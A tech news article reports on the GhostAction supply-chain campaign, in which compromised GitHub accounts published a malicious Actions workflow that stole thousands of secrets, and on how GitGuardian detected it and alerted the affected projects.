GitHub supply chain attack sees thousands of tokens and secrets stolen in GhostAction campaign

News
By published

Hundreds of accounts and thousands of secrets stolen

GitHub Webpage
(Image credit: Gil C / Shutterstock)
  • GhostAction attack stole 3,325 secrets from 327 GitHub accounts
  • GitGuardian helped shut it down and alerted affected projects
  • A separate NPM attack hit 2,000 accounts but was unrelated

Thousands of secrets such as PyPI and AWS keys, GitHub tokens, and more, were stolen recently during a supply-chain attack against GitHub, dubbed ‘GhostAction’. The attack was spotted by security researchers GitGuardian, who notified GitHub and had it shut down.

GitGuardian’s researchers first spotted the attack when they were notified of a GitHub project called FastUUID being compromised. The project’s maintainer account was evidently broken into and used to publish a malicious Actions workflow called “Add Github Actions Security workflow”.

It was designed to steal secrets, including those from PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS.

Servers shut down

The researchers reported their findings to PyPI and the project was moved to a read-only state. Soon after, the legitimate account owner regained access and withdrew the malicious commit.

However, since the attacker did not react in the next couple of days, GitGuardian’s researchers concluded that they were most likely too busy compromising other projects, and they were right. A deeper investigation uncovered 327 compromised accounts, resulting in 3,325 leaked secrets.

“Following our impact assessment, we began alerting affected users and projects by creating issues in every compromised repository,” GitGuardian explained in the report. “Among 817 affected repositories, 100 had already reverted the malicious changes. We successfully created issues for 573 of the remaining 717 projects—the others were either deleted or had disabled issues.”

Soon after GhostAction was discovered, the server to which the secrets were being exfiltrated stopped resolving, meaning the campaign was successfully disrupted.

GitGuardian was also alerted to s1ngularity, an NPM supply chain attack that compromised more than 2,000 GitHub accounts and resulted in thousands of account tokens and repository secrets being leaked. Since both attacks happened at roughly the same time, they speculated that it could have actually been all part of the same campaign. However, the investigation determined that these were two separate incidents:

“From this initial investigation, we found no intersection between those users and the recent S1ngularity attack campaign's victims. Those two incidents are likely unrelated,” they concluded.

Via BleepingComputer

You might also like

Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.